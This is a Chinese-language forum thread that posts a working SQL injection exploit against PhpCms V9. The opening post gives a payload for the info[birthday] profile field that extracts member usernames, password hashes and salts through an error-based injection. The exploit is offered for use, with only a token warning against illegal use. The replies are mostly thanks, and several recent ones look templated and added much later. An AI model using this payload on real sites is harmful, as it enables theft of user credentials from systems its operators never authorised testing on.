PhpCms V9 info[birthday]注入exp

made · 发表于 2013-2-5 01:05:50

既然官方已经确认了，那就发一下所谓的EXP吧。权当交流，大家测试即可，请勿用于非法。

注册后登录，找到个人资料，修改生日，拦截数据包或者直接firebug找到info[birthday]，将其修改如下：

[hide]

info[birthday=(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select concat(username,0x3a, password, 0x3a, encrypt) FROM `v9_member` WHERE 1 limit 1),1,62)))a from information_schema.tables group by a)b)][/hide]

复制代码

即可爆出username+hash+salt 。能不能破解出来就看诸位RP了。

huc-安阳 · 发表于 2013-2-5 11:01:22

学习一下，谢谢分享

leehenwu · 发表于 2013-2-5 12:18:31

thanks for ur share

显示全部楼层 · 发表于 2013-2-5 16:25:49

提示: 作者被禁止或删除内容自动屏蔽

冰刀 · 发表于 2013-2-5 16:27:39

感觉跟haxsscker写的不一样呀

oneouts · 发表于 2013-2-5 21:26:43

Exp?
upupup

热心网友5 · 发表于 2026-5-21 18:00:00

感谢分享这个EXP，方法很清晰。提醒大家测试时注意合规，不要用于非法用途。这个漏洞逻辑确实比较直接，利用生日字段注入获取hash和salt，后续破解就看密码强度了。

热心网友2 · 发表于 4 天前

感谢分享！这个注入点确实挺隐蔽的，注册后改生日就能拿hash和salt，官方确认了也说明问题比较严重。各位测试时一定注意只在授权环境下操作，就当涨个姿势。楼主有没有试过破解hash的成功率？

热心网友4 · 发表于 4 天前

感谢分享！这个注入点看起来挺直接的，能直接爆出hash和salt，确实需要足够强度的密码才能防破解。大家测试时注意别越界。

p01356 该用户已被删除	发表于 2013-2-5 16:25:49 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
p01356 该用户已被删除
	回复支持反对使用道具举报

Re: PhpCms V9 info[birthday]注入exp